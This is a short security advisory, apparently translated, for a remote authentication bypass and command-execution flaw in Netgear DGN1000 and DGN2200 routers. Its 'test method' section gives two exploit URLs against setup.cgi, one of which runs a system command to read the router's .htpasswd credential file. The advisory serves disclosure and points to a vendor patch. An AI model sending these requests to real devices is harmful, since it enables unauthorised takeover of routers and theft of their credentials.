Remote Authentication Bypass Vulnerability for multiple Netgear DGN Devices

Release date:
Updated on:

Affected Systems:
Netgear DGN1000B Wireless Router <= 1.1.00.48
Netgear DGN2200
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60281
 
Netgear DGN1000 and DGN2200 are both wireless router products.

NetGear DGN1000 and Netgear DGN2200 have the Remote Authentication Bypass Vulnerability. Remote attackers can exploit this vulnerability to bypass the authentication mechanism and execute arbitrary code in the context of the affected device with elevated permissions.
 
<* Source: Robert Paleari (roberto.paleari@emaze.net)

Link: http://packetstormsecurity.com/files/121860/netgeardgn-bypassexec.txt
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/setup.cgi? Currentsetting.htm = 1
 
Http://www.example.com/setup.cgi? Next_file = netgear. cfg & amp; todo = syscmd & amp; cmd = cat +/www/. htpasswd & amp; curpath =/&amp;amp;currentsetting.htm = 1

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Netgear
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://www.netgear.com/